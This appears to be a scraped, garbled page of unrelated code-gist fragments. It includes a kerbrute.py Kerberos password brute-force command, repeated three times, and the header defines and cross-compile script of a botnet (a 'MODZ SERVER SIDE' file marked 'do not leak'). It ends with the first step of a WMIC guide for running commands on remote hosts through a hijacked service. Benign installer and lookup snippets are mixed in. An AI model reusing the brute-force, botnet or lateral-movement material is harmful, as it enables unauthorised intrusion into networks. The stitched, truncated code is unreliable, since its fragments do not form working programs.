With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| #define PR_SET_NAME 15 | |
| #define SERVER_LIST_SIZE (sizeof(commServer) / sizeof(unsigned char *)) | |
| #define PAD_RIGHT 1 | |
| #define PAD_ZERO 2 | |
| #define PRINT_BUF_LEN 12 | |
| #define CMD_IAC 255 | |
| #define CMD_WILL 251 | |
| #define CMD_WONT 252 | |
| #define CMD_DO 253 | |
| #define CMD_DONT 254 |
| #Python auto cross compiler by void | |
| import subprocess, sys | |
| if len(sys.argv[2]) != 0: | |
| ip = sys.argv[2] | |
| else: | |
| print("\x1b[0;31mIncorrect Usage!") | |
| print("\x1b[0;32mUsage: python " + sys.argv[0] + " <BOTNAME.C> <IPADDR> \x1b[0m") | |
| exit(1) |
| /* | |
| ███╗ ███╗ ██████╗ ██████╗ ███████╗ | |
| ████╗ ████║██╔═══██╗██╔══██╗╚══███╔╝ | |
| ██╔████╔██║██║ ██║██║ ██║ ███╔╝ | |
| ██║╚██╔╝██║██║ ██║██║ ██║ ███╔╝ | |
| ██║ ╚═╝ ██║╚██████╔╝██████╔╝███████╗ | |
| ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ | |
| If you have this you are trusted. Please do not leak! | |
| MODZ SERVER SIDE V1 By DaddyL33T |
| # /------------------------------------------\ | |
| # | don't forget to download the .tp file | | |
| # | and place it in the user's directory :› | | |
| # | | | |
| # | also install lolcat: | | |
| # | https://github.com/busyloop/lolcat | | |
| # \------------------------------------------/ | |
| alias test-passed='if [ "$?" -eq "0" ]; then lolcat ~/.tp -a -s 40 -d 2; fi;' |
| #! /bin/bash -e | |
| # script: opencti_ubuntu_installer.sh | |
| # purpose: to automate install opencti based on manual deployment below | |
| # process: https://opencti-platform.github.io/docs/installation/manual | |
| # license: Apache 2.0 | |
| # check root ------------------------------------------------------- |
| #!/bin/bash | |
| # | |
| # By: Brady Shea - 10FEB2020 | |
| # | |
| # Usage (ip4 only): | |
| # geoip2lookup IP_ADDRESS | |
| # | |
| # ** Install GeoIP Tool and Updater ** | |
| # | |
| # sudo add-apt-repository ppa:maxmind/ppa |
| # This code was written by Chananel Gerstensang.Contact: [email protected], | |
| # Linkedin: https://www.linkedin.com/in/chananel-gerstensang-21a31b157 | |
| # Github: https://github.com/ChananelCode | |
| # Enjoy! | |
| import requests | |
| counter_Domains = 0 | |
| Domains_List = open("./DomainsList.txt", "r").read().split() |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
| As always, only for use on networks you own or have permission to test against. | |
| Similar functionality to SpiderLabs SCShell (https://github.com/SpiderLabs/SCShell) but from the command line using WMIC to run commands on other systems remotely. | |
| If attempting to run multiple commands, SCShell will probably be move convenient as it automates the below steps. However, for one-offs this works fine as well. | |
| The process involves a total of four commands, three of which can be combined on the command line to form one large block. | |
| Step 1: Get the current pathName of your target service so we can restore it once we've ran our command (in our case XblAuthManager) | |
| wmic /user:DOMAIN\USERNAME /password:PASSWORD /node:TARGET_IP service where name='XblAuthManager' get pathName |